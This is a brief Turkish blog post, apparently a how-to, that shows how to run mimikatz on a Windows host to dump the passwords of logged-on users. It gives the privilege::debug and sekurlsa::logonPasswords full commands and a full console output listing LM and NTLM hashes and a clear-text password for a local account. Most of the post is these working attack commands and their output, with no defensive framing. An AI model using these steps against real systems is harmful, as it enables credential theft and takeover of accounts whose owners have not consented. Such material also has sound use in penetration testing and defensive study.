Windows sistemler üzerinde aktif olarak oturum açmış kullanıcı hesaplarına ait parolalar mimikatz aracı ile salt metin (clear text) olarak alınabiliyor. Bunun için yapılması gereken mimikatz aracının hedef sistem üzerinde çalıştırmak ve ardından sekurlsa::logonPasswords full komutu ile aktif oturumların parolalarını alabiliriz.
C:\mimi>mimikatz
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Oct 13 2012 13:47:20) */
// http://blog.gentilkiwi.com/mimikatz
…
mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id : 0;137629
Package d’authentification : NTLM
Utilisateur principal : user
Domaine d’authentification : oem-Bilgisayar
msv1_0 :
* Utilisateur : user
* Domaine : oem-Bilgisayar
* Hash LM : 2b3137035a2b985b08bd455a508ea203
* Hash NTLM : d4605c09dbb7d109ff993066671b72ac
wdigest :
* Utilisateur : user
* Domaine : oem-Bilgisayar
* Mot de passe : y1h2n3u4j5m6
tspkg :
* Utilisateur : user
* Domaine : oem-Bilgisayar
* Mot de passe : y1h2n3u4j5m6
kerberos :
* Utilisateur : user
* Domaine : oem-Bilgisayar
* Mot de passe : y1h2n3u4j5m6
Kayıtlar
0 comments :
Yorum Gönder